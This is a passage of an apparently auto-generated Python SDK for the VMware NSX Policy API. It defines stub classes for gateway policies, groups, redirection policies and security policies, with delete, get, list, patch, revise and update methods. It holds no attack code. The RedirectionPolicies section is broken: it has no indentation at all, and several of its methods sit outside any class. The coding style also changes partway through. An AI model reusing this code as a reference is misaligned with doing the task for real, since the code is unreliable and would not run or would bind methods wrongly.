        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('update',
                            {
                            'domain_id': domain_id,
                            'communication_map_id': communication_map_id,
                            'communication_map': communication_map,
                            })
class GatewayPolicies(VapiInterface):
    """
    vAPI stub for the
    ``com.vmware.nsx_policy.infra.domains.gateway_policies`` service:
    CRUD and precedence (revise) operations on gateway policies scoped to
    a domain.
    """
    # Allowed values for the ``operation`` argument of :func:`revise`.
    REVISE_OPERATION_TOP = "insert_top"
    """
    Possible value for ``operation`` of method :func:`GatewayPolicies.revise`.

    """
    REVISE_OPERATION_BOTTOM = "insert_bottom"
    """
    Possible value for ``operation`` of method :func:`GatewayPolicies.revise`.

    """
    REVISE_OPERATION_AFTER = "insert_after"
    """
    Possible value for ``operation`` of method :func:`GatewayPolicies.revise`.

    """
    REVISE_OPERATION_BEFORE = "insert_before"
    """
    Possible value for ``operation`` of method :func:`GatewayPolicies.revise`.

    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx_policy.infra.domains.gateway_policies'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _GatewayPoliciesStub)
        self._VAPI_OPERATION_IDS = {}

    def delete(self,
               domain_id,
               gateway_policy_id,
               ):
        """
        Delete GatewayPolicy

        :type  domain_id: :class:`str`
        :param domain_id: (required)
        :type  gateway_policy_id: :class:`str`
        :param gateway_policy_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('delete',
                            {
                            'domain_id': domain_id,
                            'gateway_policy_id': gateway_policy_id,
                            })

    def get(self,
            domain_id,
            gateway_policy_id,
            ):
        """
        Read gateway policy for a domain.

        :type  domain_id: :class:`str`
        :param domain_id: (required)
        :type  gateway_policy_id: :class:`str`
        :param gateway_policy_id: (required)
        :rtype: :class:`com.vmware.nsx_policy.model_client.GatewayPolicy`
        :return: com.vmware.nsx_policy.model.GatewayPolicy
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('get',
                            {
                            'domain_id': domain_id,
                            'gateway_policy_id': gateway_policy_id,
                            })

    def list(self,
             domain_id,
             cursor=None,
             include_mark_for_delete_objects=None,
             included_fields=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None,
             ):
        """
        List all gateway policies for specified Domain.

        :type  domain_id: :class:`str`
        :param domain_id: (required)
        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of records (supplied
            by current result page) (optional)
        :type  include_mark_for_delete_objects: :class:`bool` or ``None``
        :param include_mark_for_delete_objects: Include objects that are marked for deletion in results (optional,
            default to false)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be included in query
            result (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page (server may return
            fewer) (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx_policy.model_client.GatewayPolicyListResult`
        :return: com.vmware.nsx_policy.model.GatewayPolicyListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('list',
                            {
                            'domain_id': domain_id,
                            'cursor': cursor,
                            'include_mark_for_delete_objects': include_mark_for_delete_objects,
                            'included_fields': included_fields,
                            'page_size': page_size,
                            'sort_ascending': sort_ascending,
                            'sort_by': sort_by,
                            })

    def patch(self,
              domain_id,
              gateway_policy_id,
              gateway_policy,
              ):
        """
        Update the gateway policy for a domain. This is a full replace. All the
        rules are replaced.

        :type  domain_id: :class:`str`
        :param domain_id: (required)
        :type  gateway_policy_id: :class:`str`
        :param gateway_policy_id: (required)
        :type  gateway_policy: :class:`com.vmware.nsx_policy.model_client.GatewayPolicy`
        :param gateway_policy: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('patch',
                            {
                            'domain_id': domain_id,
                            'gateway_policy_id': gateway_policy_id,
                            'gateway_policy': gateway_policy,
                            })

    def revise(self,
               domain_id,
               gateway_policy_id,
               gateway_policy,
               anchor_path=None,
               operation=None,
               ):
        """
        This is used to set a precedence of a gateway policy w.r.t others.

        :type  domain_id: :class:`str`
        :param domain_id: (required)
        :type  gateway_policy_id: :class:`str`
        :param gateway_policy_id: (required)
        :type  gateway_policy: :class:`com.vmware.nsx_policy.model_client.GatewayPolicy`
        :param gateway_policy: (required)
        :type  anchor_path: :class:`str` or ``None``
        :param anchor_path: The security policy/rule path if operation is 'insert_after' or
            'insert_before' (optional)
        :type  operation: :class:`str` or ``None``
        :param operation: Operation (optional, default to insert_top)
        :rtype: :class:`com.vmware.nsx_policy.model_client.GatewayPolicy`
        :return: com.vmware.nsx_policy.model.GatewayPolicy
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('revise',
                            {
                            'domain_id': domain_id,
                            'gateway_policy_id': gateway_policy_id,
                            'gateway_policy': gateway_policy,
                            'anchor_path': anchor_path,
                            'operation': operation,
                            })

    def update(self,
               domain_id,
               gateway_policy_id,
               gateway_policy,
               ):
        """
        Update the gateway policy for a domain. This is a full replace. All the
        rules are replaced.

        :type  domain_id: :class:`str`
        :param domain_id: (required)
        :type  gateway_policy_id: :class:`str`
        :param gateway_policy_id: (required)
        :type  gateway_policy: :class:`com.vmware.nsx_policy.model_client.GatewayPolicy`
        :param gateway_policy: (required)
        :rtype: :class:`com.vmware.nsx_policy.model_client.GatewayPolicy`
        :return: com.vmware.nsx_policy.model.GatewayPolicy
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('update',
                            {
                            'domain_id': domain_id,
                            'gateway_policy_id': gateway_policy_id,
                            'gateway_policy': gateway_policy,
                            })
class Groups(VapiInterface):
    """
    vAPI stub for the ``com.vmware.nsx_policy.infra.domains.groups``
    service: CRUD operations on groups scoped to a domain.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx_policy.infra.domains.groups'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _GroupsStub)
        self._VAPI_OPERATION_IDS = {}

    def delete(self,
               domain_id,
               group_id,
               fail_if_subtree_exists=None,
               force=None,
               ):
        """
        Delete Group

        :type  domain_id: :class:`str`
        :param domain_id: Domain ID (required)
        :type  group_id: :class:`str`
        :param group_id: Group ID (required)
        :type  fail_if_subtree_exists: :class:`bool` or ``None``
        :param fail_if_subtree_exists: Do not delete if the group subtree has any entities (optional,
            default to false)
        :type  force: :class:`bool` or ``None``
        :param force: Force delete the resource even if it is being used somewhere
            (optional, default to false)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('delete',
                            {
                            'domain_id': domain_id,
                            'group_id': group_id,
                            'fail_if_subtree_exists': fail_if_subtree_exists,
                            'force': force,
                            })

    def get(self,
            domain_id,
            group_id,
            ):
        """
        Read group

        :type  domain_id: :class:`str`
        :param domain_id: Domain ID (required)
        :type  group_id: :class:`str`
        :param group_id: Group ID (required)
        :rtype: :class:`com.vmware.nsx_policy.model_client.Group`
        :return: com.vmware.nsx_policy.model.Group
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('get',
                            {
                            'domain_id': domain_id,
                            'group_id': group_id,
                            })

    def list(self,
             domain_id,
             cursor=None,
             include_mark_for_delete_objects=None,
             included_fields=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None,
             ):
        """
        List Groups for a domain

        :type  domain_id: :class:`str`
        :param domain_id: Domain ID (required)
        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of records (supplied
            by current result page) (optional)
        :type  include_mark_for_delete_objects: :class:`bool` or ``None``
        :param include_mark_for_delete_objects: Include objects that are marked for deletion in results (optional,
            default to false)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be included in query
            result (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page (server may return
            fewer) (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx_policy.model_client.GroupListResult`
        :return: com.vmware.nsx_policy.model.GroupListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('list',
                            {
                            'domain_id': domain_id,
                            'cursor': cursor,
                            'include_mark_for_delete_objects': include_mark_for_delete_objects,
                            'included_fields': included_fields,
                            'page_size': page_size,
                            'sort_ascending': sort_ascending,
                            'sort_by': sort_by,
                            })

    def patch(self,
              domain_id,
              group_id,
              group,
              ):
        """
        If a group with the group-id is not already present, create a new
        group. If it already exists, patch the group.

        :type  domain_id: :class:`str`
        :param domain_id: Domain ID (required)
        :type  group_id: :class:`str`
        :param group_id: Group ID (required)
        :type  group: :class:`com.vmware.nsx_policy.model_client.Group`
        :param group: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('patch',
                            {
                            'domain_id': domain_id,
                            'group_id': group_id,
                            'group': group,
                            })

    def update(self,
               domain_id,
               group_id,
               group,
               ):
        """
        If a group with the group-id is not already present, create a new
        group. If it already exists, update the group.

        :type  domain_id: :class:`str`
        :param domain_id: Domain ID (required)
        :type  group_id: :class:`str`
        :param group_id: Group ID (required)
        :type  group: :class:`com.vmware.nsx_policy.model_client.Group`
        :param group: (required)
        :rtype: :class:`com.vmware.nsx_policy.model_client.Group`
        :return: com.vmware.nsx_policy.model.Group
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('update',
                            {
                            'domain_id': domain_id,
                            'group_id': group_id,
                            'group': group,
                            })
class RedirectionPolicies(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx_policy.infra.domains.redirection_policies'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _RedirectionPoliciesStub)
self._VAPI_OPERATION_IDS = {}
def delete(self,
domain_id,
redirection_policy_id,
):
"""
Delete redirection policy.
:type domain_id: :class:`str`
:param domain_id: Domain id (required)
:type redirection_policy_id: :class:`str`
:param redirection_policy_id: Redirection map id (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'domain_id': domain_id,
'redirection_policy_id': redirection_policy_id,
})
def get(self,
domain_id,
redirection_policy_id,
):
"""
Read redirection policy.
:type domain_id: :class:`str`
:param domain_id: Domain id (required)
:type redirection_policy_id: :class:`str`
:param redirection_policy_id: Redirection map id (required)
:rtype: :class:`com.vmware.nsx_policy.model_client.RedirectionPolicy`
:return: com.vmware.nsx_policy.model.RedirectionPolicy
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'domain_id': domain_id,
'redirection_policy_id': redirection_policy_id,
})
def list(self,
         cursor=None,
         include_mark_for_delete_objects=None,
         included_fields=None,
         page_size=None,
         sort_ascending=None,
         sort_by=None,
         ):
    """
    List all redirection policies across all domains ordered by precedence.

    :type  cursor: :class:`str` or ``None``
    :param cursor: Opaque cursor to be used for getting next page of records
        (supplied by current result page) (optional)
    :type  include_mark_for_delete_objects: :class:`bool` or ``None``
    :param include_mark_for_delete_objects: Include objects that are marked
        for deletion in results (optional, default to false)
    :type  included_fields: :class:`str` or ``None``
    :param included_fields: Comma separated list of fields that should be
        included in query result (optional)
    :type  page_size: :class:`long` or ``None``
    :param page_size: Maximum number of results to return in this page
        (server may return fewer) (optional, default to 1000)
    :type  sort_ascending: :class:`bool` or ``None``
    :param sort_ascending: (optional)
    :type  sort_by: :class:`str` or ``None``
    :param sort_by: Field by which records are sorted (optional)
    :rtype: :class:`com.vmware.nsx_policy.model_client.RedirectionPolicyListResult`
    :return: com.vmware.nsx_policy.model.RedirectionPolicyListResult
    :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
        Service Unavailable
    :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
        Bad Request, Precondition Failed
    :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
        Internal Server Error
    :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
        Forbidden
    :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
        Not Found
    """
    # Every parameter is an optional paging/sorting control; forward them all.
    call_args = {
        'cursor': cursor,
        'include_mark_for_delete_objects': include_mark_for_delete_objects,
        'included_fields': included_fields,
        'page_size': page_size,
        'sort_ascending': sort_ascending,
        'sort_by': sort_by,
    }
    return self._invoke('list', call_args)
def list_0(self,
           domain_id,
           cursor=None,
           include_mark_for_delete_objects=None,
           included_fields=None,
           page_size=None,
           sort_ascending=None,
           sort_by=None,
           ):
    """
    List redirection policies for a domain.

    :type  domain_id: :class:`str`
    :param domain_id: Domain id (required)
    :type  cursor: :class:`str` or ``None``
    :param cursor: Opaque cursor to be used for getting next page of records
        (supplied by current result page) (optional)
    :type  include_mark_for_delete_objects: :class:`bool` or ``None``
    :param include_mark_for_delete_objects: Include objects that are marked
        for deletion in results (optional, default to false)
    :type  included_fields: :class:`str` or ``None``
    :param included_fields: Comma separated list of fields that should be
        included in query result (optional)
    :type  page_size: :class:`long` or ``None``
    :param page_size: Maximum number of results to return in this page
        (server may return fewer) (optional, default to 1000)
    :type  sort_ascending: :class:`bool` or ``None``
    :param sort_ascending: (optional)
    :type  sort_by: :class:`str` or ``None``
    :param sort_by: Field by which records are sorted (optional)
    :rtype: :class:`com.vmware.nsx_policy.model_client.RedirectionPolicyListResult`
    :return: com.vmware.nsx_policy.model.RedirectionPolicyListResult
    :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
        Service Unavailable
    :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
        Bad Request, Precondition Failed
    :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
        Internal Server Error
    :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
        Forbidden
    :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
        Not Found
    """
    # Same paging controls as list(), scoped to one domain.
    call_args = {
        'domain_id': domain_id,
        'cursor': cursor,
        'include_mark_for_delete_objects': include_mark_for_delete_objects,
        'included_fields': included_fields,
        'page_size': page_size,
        'sort_ascending': sort_ascending,
        'sort_by': sort_by,
    }
    return self._invoke('list_0', call_args)
def patch(self, domain_id, redirection_policy_id, redirection_policy):
    """
    Create or update the redirection policy.

    :type  domain_id: :class:`str`
    :param domain_id: Domain id (required)
    :type  redirection_policy_id: :class:`str`
    :param redirection_policy_id: Redirection map id (required)
    :type  redirection_policy: :class:`com.vmware.nsx_policy.model_client.RedirectionPolicy`
    :param redirection_policy: (required)
    :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
        Service Unavailable
    :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
        Bad Request, Precondition Failed
    :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
        Internal Server Error
    :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
        Forbidden
    :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
        Not Found
    """
    # Collect the operation arguments first, then dispatch through the stub.
    call_args = {
        'domain_id': domain_id,
        'redirection_policy_id': redirection_policy_id,
        'redirection_policy': redirection_policy,
    }
    return self._invoke('patch', call_args)
def update(self, domain_id, redirection_policy_id, redirection_policy):
    """
    Create or update the redirection policy.

    :type  domain_id: :class:`str`
    :param domain_id: Domain id (required)
    :type  redirection_policy_id: :class:`str`
    :param redirection_policy_id: Redirection map id (required)
    :type  redirection_policy: :class:`com.vmware.nsx_policy.model_client.RedirectionPolicy`
    :param redirection_policy: (required)
    :rtype: :class:`com.vmware.nsx_policy.model_client.RedirectionPolicy`
    :return: com.vmware.nsx_policy.model.RedirectionPolicy
    :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
        Service Unavailable
    :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
        Bad Request, Precondition Failed
    :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
        Internal Server Error
    :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
        Forbidden
    :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
        Not Found
    """
    # Collect the operation arguments first, then dispatch through the stub.
    call_args = {
        'domain_id': domain_id,
        'redirection_policy_id': redirection_policy_id,
        'redirection_policy': redirection_policy,
    }
    return self._invoke('update', call_args)
class SecurityPolicies(VapiInterface):
    """
    Client-side stub for the
    ``com.vmware.nsx_policy.infra.domains.security_policies`` service.
    """
    REVISE_OPERATION_TOP = "insert_top"
    """
    Possible value for ``operation`` of method :func:`SecurityPolicies.revise`.
    """
    REVISE_OPERATION_BOTTOM = "insert_bottom"
    """
    Possible value for ``operation`` of method :func:`SecurityPolicies.revise`.
    """
    REVISE_OPERATION_AFTER = "insert_after"
    """
    Possible value for ``operation`` of method :func:`SecurityPolicies.revise`.
    """
    REVISE_OPERATION_BEFORE = "insert_before"
    """
    Possible value for ``operation`` of method :func:`SecurityPolicies.revise`.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx_policy.infra.domains.security_policies'
    """
    Identifier of the service in canonical form.
    """

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _SecurityPoliciesStub)
        # No per-operation identifier overrides for this service.
        self._VAPI_OPERATION_IDS = {}

    def delete(self, domain_id, security_policy_id):
        """
        Deletes the security policy along with all the rules.

        :type  domain_id: :class:`str`
        :param domain_id: (required)
        :type  security_policy_id: :class:`str`
        :param security_policy_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'domain_id': domain_id,
            'security_policy_id': security_policy_id,
        }
        return self._invoke('delete', call_args)

    def get(self, domain_id, security_policy_id):
        """
        Read security policy for a domain.

        :type  domain_id: :class:`str`
        :param domain_id: (required)
        :type  security_policy_id: :class:`str`
        :param security_policy_id: (required)
        :rtype: :class:`com.vmware.nsx_policy.model_client.SecurityPolicy`
        :return: com.vmware.nsx_policy.model.SecurityPolicy
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'domain_id': domain_id,
            'security_policy_id': security_policy_id,
        }
        return self._invoke('get', call_args)

    def list(self,
             domain_id,
             cursor=None,
             include_mark_for_delete_objects=None,
             included_fields=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None,
             ):
        """
        List all security policies for a domain.

        :type  domain_id: :class:`str`
        :param domain_id: (required)
        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of
            records (supplied by current result page) (optional)
        :type  include_mark_for_delete_objects: :class:`bool` or ``None``
        :param include_mark_for_delete_objects: Include objects that are
            marked for deletion in results (optional, default to false)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be
            included in query result (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page
            (server may return fewer) (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx_policy.model_client.SecurityPolicyListResult`
        :return: com.vmware.nsx_policy.model.SecurityPolicyListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'domain_id': domain_id,
            'cursor': cursor,
            'include_mark_for_delete_objects': include_mark_for_delete_objects,
            'included_fields': included_fields,
            'page_size': page_size,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', call_args)

    def patch(self, domain_id, security_policy_id, security_policy):
        """
        Patch the security policy for a domain. If a security policy for the
        given security-policy-id is not present, the object will get created
        and if it is present it will be updated. This is a full replace.

        :type  domain_id: :class:`str`
        :param domain_id: (required)
        :type  security_policy_id: :class:`str`
        :param security_policy_id: (required)
        :type  security_policy: :class:`com.vmware.nsx_policy.model_client.SecurityPolicy`
        :param security_policy: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'domain_id': domain_id,
            'security_policy_id': security_policy_id,
            'security_policy': security_policy,
        }
        return self._invoke('patch', call_args)

    def revise(self,
               domain_id,
               security_policy_id,
               security_policy,
               anchor_path=None,
               operation=None,
               ):
        """
        This is used to set a precedence of a security policy w.r.t others.

        :type  domain_id: :class:`str`
        :param domain_id: (required)
        :type  security_policy_id: :class:`str`
        :param security_policy_id: (required)
        :type  security_policy: :class:`com.vmware.nsx_policy.model_client.SecurityPolicy`
        :param security_policy: (required)
        :type  anchor_path: :class:`str` or ``None``
        :param anchor_path: The security policy/rule path if operation is
            'insert_after' or 'insert_before' (optional)
        :type  operation: :class:`str` or ``None``
        :param operation: Operation (optional, default to insert_top)
        :rtype: :class:`com.vmware.nsx_policy.model_client.SecurityPolicy`
        :return: com.vmware.nsx_policy.model.SecurityPolicy
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'domain_id': domain_id,
            'security_policy_id': security_policy_id,
            'security_policy': security_policy,
            'anchor_path': anchor_path,
            'operation': operation,
        }
        return self._invoke('revise', call_args)

    def update(self, domain_id, security_policy_id, security_policy):
        """
        Create or Update the security policy for a domain. This is a full
        replace. All the rules are replaced.

        :type  domain_id: :class:`str`
        :param domain_id: (required)
        :type  security_policy_id: :class:`str`
        :param security_policy_id: (required)
        :type  security_policy: :class:`com.vmware.nsx_policy.model_client.SecurityPolicy`
        :param security_policy: (required)
        :rtype: :class:`com.vmware.nsx_policy.model_client.SecurityPolicy`
        :return: com.vmware.nsx_policy.model.SecurityPolicy
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'domain_id': domain_id,
            'security_policy_id': security_policy_id,
            'security_policy': security_policy,
        }
        return self._invoke('update', call_args)
class _CommunicationMapsStub(ApiInterfaceStub):
    """REST stub metadata for the communication-maps service."""

    def __init__(self, config):
